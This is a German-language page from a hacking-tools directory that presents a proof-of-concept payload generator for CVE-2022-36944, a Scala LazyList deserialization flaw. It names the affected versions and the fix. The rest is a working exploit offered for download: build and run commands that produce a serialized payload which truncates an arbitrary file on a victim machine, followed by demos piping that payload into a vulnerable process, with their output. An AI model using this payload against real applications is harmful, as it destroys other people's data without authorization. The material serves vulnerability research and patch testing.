Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
lazylist-cve-poc — POC für den Exploit der Schwachstelle CVE-2022-36944 | Kitploit
Tools/GitHubGitHub/yarocher/lazylist-cve-poc
Payload-GenerierungSchwachstellenanalyseExploitationLernen & BildungBinary-Exploitation
GitHubyarocher/lazylist-cve-poc

lazylist-cve-poc

POC für den Exploit der Schwachstelle CVE-2022-36944

Repository anzeigen
11113vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-36944 Payload-Generator

Dieses Miniprojekt wurde erstellt, um einen Proof-of-Concept der CVE-2022-36944-Sicherheitslücke zu demonstrieren. Es ähnelt ysoserial, generiert jedoch nur Payloads für diese CVE mit der LazyList-Klasse.

Kurze FAQ

Welche Artefakte enthalten die Sicherheitslücke?

org.scala-lang:scala-library mit Versionen 2.13.x vor 2.13.9

Welche Anwendungen sind betroffen?

Zwei Bedingungen müssen zusammenkommen, damit Ihre Anwendung ausnutzbar ist:

  • Ihre Anwendung enthält die anfällige scala-library-JAR im Klassenpfad
  • ObjectInputStream#readObject() wird irgendwo in Ihrer Anwendung aufgerufen und nicht vertrauenswürdige Daten (vom Angreifer kontrolliert) werden übergeben

Wo wurde die Sicherheitslücke behoben?

Siehe Scala PR: #10118

Erstellen

root@kitploit:~
mvn clean package

Ausführen

Der folgende Befehl gibt den Payload in stdout aus, der verwendet werden kann, um eine beliebige Datei auf dem Opferrechner zu kürzen:

root@kitploit:~
mvn -q exec:java -Dexec.mainClass="poc.cve.lazylist.payload.Main" -Dexec.args="/file/to/truncate false"

Demo

A) Über eine Datei

  1. Bereiten Sie eine Testdatei mit etwas Inhalt vor:
root@kitploit:~
$ yes sometestdata > test_data
^C
$ head test_data 
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
  1. Generieren Sie den Payload und speichern Sie ihn in der Datei payload.ser:
root@kitploit:~
$ mvn -q exec:java -Dexec.mainClass="poc.cve.lazylist.payload.Main" -Dexec.args="${PWD}/test_data false" > payload.ser
  1. Führen Sie den Opferprozess aus (ClassCastException wird erwartet):
root@kitploit:~
$ mvn -q exec:java -Dexec.mainClass="poc.cve.lazylist.victim.Victim" -Dexec.args="payload.ser"
[ERROR] Failed to execute goal org.codehaus.mojo:exec-maven-plugin:3.1.0:java (default-cli) on project lazylist-cve-poc: An exception occurred while executing the Java class. java.lang.ClassCastException: class java.io.FileOutputStream cannot be cast to class scala.collection.immutable.LazyList$State (java.io.FileOutputStream is in module java.base of loader 'bootstrap'; scala.collection.immutable.LazyList$State is in unnamed module of loader org.codehaus.mojo.exec.URLClassLoaderBuilder$ExecJavaClassLoader @72805168) -> [Help 1]
[ERROR] 
[ERROR] To see the full stack trace of the errors, re-run Maven with the -e switch.
[ERROR] Re-run Maven using the -X switch to enable full debug logging.
[ERROR] 
[ERROR] For more information about the errors and possible solutions, please read the following articles:
[ERROR] [Help 1] http://cwiki.apache.org/confluence/display/MAVEN/MojoExecutionException
  1. Überprüfen Sie, ob die Opferdatei gekürzt wurde:
root@kitploit:~
$ head test_data 
$ 

B) Über Pipe an stdin

Schritte 2-3 können auf diese Weise kombiniert werden (verwenden Sie "-" als Datei für Victim):

root@kitploit:~
$ mvn -q exec:java -Dexec.mainClass="poc.cve.lazylist.payload.Main" -Dexec.args="${PWD}/test_data false" | mvn -q exec:java -Dexec.mainClass="poc.cve.lazylist.victim.Victim" -Dexec.args="-"
[ERROR] Failed to execute goal org.codehaus.mojo:exec-maven-plugin:3.1.0:java (default-cli) on project lazylist-cve-poc: An exception occurred while executing the Java class. java.lang.ClassCastException: class java.io.FileOutputStream cannot be cast to class scala.collection.immutable.LazyList$State (java.io.FileOutputStream is in module java.base of loader 'bootstrap'; scala.collection.immutable.LazyList$State is in unnamed module of loader org.codehaus.mojo.exec.URLClassLoaderBuilder$ExecJavaClassLoader @72805168) -> [Help 1]
[ERROR] 
[ERROR] To see the full stack trace of the errors, re-run Maven with the -e switch.
[ERROR] Re-run Maven using the -X switch to enable full debug logging.
[ERROR] 
[ERROR] For more information about the errors and possible solutions, please read the following articles:
[ERROR] [Help 1] http://cwiki.apache.org/confluence/display/MAVEN/MojoExecutionException
Tool herunterladen